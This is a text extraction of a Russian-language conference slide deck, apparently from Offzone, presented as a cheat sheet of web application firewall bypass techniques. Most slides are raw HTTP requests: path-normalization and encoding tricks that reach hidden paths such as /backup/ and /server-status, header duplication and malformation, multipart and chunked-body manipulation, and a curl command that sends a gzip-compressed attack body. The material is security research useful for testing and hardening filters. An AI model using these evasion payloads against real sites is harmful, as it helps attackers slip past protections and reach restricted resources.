Download as PDF, PPTX
Uploaded byДмитрий Бумов
Offzone | Another waf bypass
Документ представляет собой чек-лист о способах обхода веб-аппликационных брандмауэров (WAF). В нем обсуждаются различные HTTP-запросы и манипуляции с заголовками, а также примеры несанкционированного доступа к страничкам. Основное внимание уделяется использованию логики нормализации и обходу ограничений на уровне приложения.
Offzone | Another waf bypass
- 1. Another way tobypass WAF Cheat Sheet Антон Лопаницын Security researcher
- 2. HTTP Request GET /login.phpHTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive
- 3. rn перед началомHTTP-запроса
- 4. Apache get /login.php HTTP/1.1 Host:favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Регистр метода
- 5. IIS GET /login.php HTTP/1.1 Host:favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Пробел или знак табуляции перед методом
- 6. Any hello/%2e%2e/backup/world/%2e%2e => GET /backup/ HTTP/1.1 Использованиелогики нормализации
- 7. Nginx GET /hello /%2e%2e/backup/ => GET/backup/ HTTP/1.1 Использование логики нормализации
- 8. Any GET /%2fbackup/ HTTP/1.1 GET/%2e%2fbackup/ HTTP/1.1 GET /%252fbackup/ HTTP/1.1 GET /%5cbackup/ HTTP/1.1 GET /%C0%AFbackup/ HTTP/1.1 Использование логики нормализации
- 9. GET /backup;/ HTTP/1.1 GET/..;/backup/ HTTP/1.1 GET /backup%20/ HTTP/1.1 Использование логики нормализации
- 10. GET /%e2%80%aesutats-revres/ HTTP/1.1 => /server-status/ U+202E:RIGHT-TO-LEFT OVERRIDE, без пруфов
- 11. PHP GET /login.php?shell.exec HTTP/1.1 GET/login.php?shell[exec HTTP/1.1
- 12. PHP GET /login.php?shell%5bexec HTTP/1.1 GET/login.php?shell%2eexec HTTP/1.1 GET /login.php?shell%5fexec HTTP/1.1 GET /login.php?shell%20exec HTTP/1.1
- 13.
- 14.
- 15. HTTP Request GET /login.phpHTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive
- 16. HTTP Request -absoluteURI GET http://localhost/login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive
- 17.
- 18.
- 19. Host header GET /login.phpHTTP/1.1 Host: favoritewaf.com Host: localhost User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Дублирование заголовков
- 20. Host header GET /login.phpHTTP/1.1 host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Заголовок с маленькой буквы
- 21. Host header GET /login.phpHTTP/1.1 Host:favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Отсутствие разделителя или табуляция вместо пробела
- 22. Host header GET /login.phpHTTP/1.1 Host: favoritewaf.com:8800 User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Дополнительные символы к заголовку Host
- 23. Host header . / : x00 x20 x09 - Дополнительные символык заголовку Host IIS NGINX ANY
- 24. HTTP Request -absoluteURI POST /login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Type: application/another-text/+++x-www-form-urlencoded hello=world Некорректное значение Content-type
- 25. HTTP Request -absoluteURI GET /login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 1 AAAAAAAA Данных больше, чем в Content-length
- 26. GET /login.php HTTP/1.1 Host:favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Type: multipart/form-data; boundary=--------1218108630 ----------1218108630 Content-Disposition: form-data; name="hello" world ----------1218108630-- Content-type multipart
- 27. GET /login.php HTTP/1.1 Host:favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Type: multipart/form-data; boundary=--------1218108630 ----------1218108630 Content-Disposition: form-data; name="hello" world ----------1218108630-- Content-type multipart
- 28. Content-Disposition: form-data; name="hello" Content-Disposition:form-data; name="hello Content-Disposition: form-data; name="hello"world" Content-Disposition: attachment; name="hello" Изменение имени параметра
- 29.
- 30. Content-Type: multipart/form-data; boundary=x Content-Length:72 --x Content-Disposition: test1; --x test2; --x-- test3; name="hello" world Объявление имени параметра
- 31.
- 32. Content-Type: multipart/form-data; boundary=HELLOx00XXXXXXXXX Отбрасывание частиразделителя нульбайтом
- 33. Можно ли отправитьPOST с данными без заголовка Content- Length?
- 34. Content-Type: application/x-www-form- urlencoded Transfer-Encoding: chunked 0B hello=world 0 Отбрасываниечасти разделителя нульбайтом
- 35.
- 36.
- 37. What about TCPWindow Size? ВОТ ЭБАУТ ТИСИПИ ВИНДОВ САЙЗ?
- 38. $ printf ""| gzip > my.z $ printf "mysuperattack" | gzip >> my.z $ curl --data-binary @my.z -H "Content-Encoding: gzip" -X POST 'http://favoritewaf.com'
- 39.